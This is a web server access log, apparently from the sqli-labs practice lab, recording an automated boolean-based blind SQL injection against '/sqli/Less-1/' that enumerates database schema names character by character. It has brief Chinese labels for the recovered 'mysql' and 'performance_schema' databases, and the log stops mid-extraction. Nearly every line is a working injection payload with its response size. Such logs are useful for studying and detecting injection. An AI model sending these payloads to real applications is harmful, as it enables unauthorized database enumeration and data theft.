10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),5,1))>48 AND 'ZbCG'='ZbCG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),5,1))>1 AND 'ZbCG'='ZbCG HTTP/1.1" 200 670

mysql 数据库

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),1,1))>64 AND 'tfxG'='tfxG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),1,1))>96 AND 'tfxG'='tfxG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),1,1))>112 AND 'tfxG'='tfxG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),1,1))>104 AND 'tfxG'='tfxG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),1,1))>108 AND 'tfxG'='tfxG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),1,1))>110 AND 'tfxG'='tfxG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),1,1))>109 AND 'tfxG'='tfxG HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),2,1))>96 AND 'tfxG'='tfxG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),2,1))>112 AND 'tfxG'='tfxG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),2,1))>120 AND 'tfxG'='tfxG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),2,1))>124 AND 'tfxG'='tfxG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),2,1))>122 AND 'tfxG'='tfxG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),2,1))>121 AND 'tfxG'='tfxG HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),3,1))>96 AND 'tfxG'='tfxG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),3,1))>112 AND 'tfxG'='tfxG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),3,1))>120 AND 'tfxG'='tfxG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),3,1))>116 AND 'tfxG'='tfxG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),3,1))>114 AND 'tfxG'='tfxG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),3,1))>115 AND 'tfxG'='tfxG HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),4,1))>96 AND 'tfxG'='tfxG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),4,1))>112 AND 'tfxG'='tfxG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),4,1))>120 AND 'tfxG'='tfxG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),4,1))>116 AND 'tfxG'='tfxG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),4,1))>114 AND 'tfxG'='tfxG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),4,1))>113 AND 'tfxG'='tfxG HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),5,1))>96 AND 'tfxG'='tfxG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),5,1))>112 AND 'tfxG'='tfxG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),5,1))>104 AND 'tfxG'='tfxG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),5,1))>108 AND 'tfxG'='tfxG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),5,1))>106 AND 'tfxG'='tfxG HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),5,1))>107 AND 'tfxG'='tfxG HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),6,1))>96 AND 'tfxG'='tfxG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),6,1))>48 AND 'tfxG'='tfxG HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),6,1))>1 AND 'tfxG'='tfxG HTTP/1.1" 200 670

performance_schema 数据库

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),1,1))>64 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),1,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),1,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),1,1))>104 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),1,1))>108 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),1,1))>110 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),1,1))>111 AND 'TQAR'='TQAR HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),2,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),2,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),2,1))>104 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),2,1))>100 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),2,1))>102 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),2,1))>101 AND 'TQAR'='TQAR HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),3,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),3,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),3,1))>120 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),3,1))>116 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),3,1))>114 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),3,1))>113 AND 'TQAR'='TQAR HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),4,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),4,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),4,1))>104 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),4,1))>100 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),4,1))>102 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),4,1))>101 AND 'TQAR'='TQAR HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),5,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),5,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),5,1))>104 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),5,1))>108 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),5,1))>110 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),5,1))>111 AND 'TQAR'='TQAR HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),6,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),6,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),6,1))>120 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),6,1))>116 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),6,1))>114 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),6,1))>113 AND 'TQAR'='TQAR HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),7,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),7,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),7,1))>104 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),7,1))>108 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),7,1))>110 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),7,1))>109 AND 'TQAR'='TQAR HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),8,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),8,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:50  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),8,1))>104 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),8,1))>100 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),8,1))>98 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),8,1))>97 AND 'TQAR'='TQAR HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),9,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),9,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),9,1))>104 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),9,1))>108 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),9,1))>110 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),9,1))>109 AND 'TQAR'='TQAR HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),10,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750
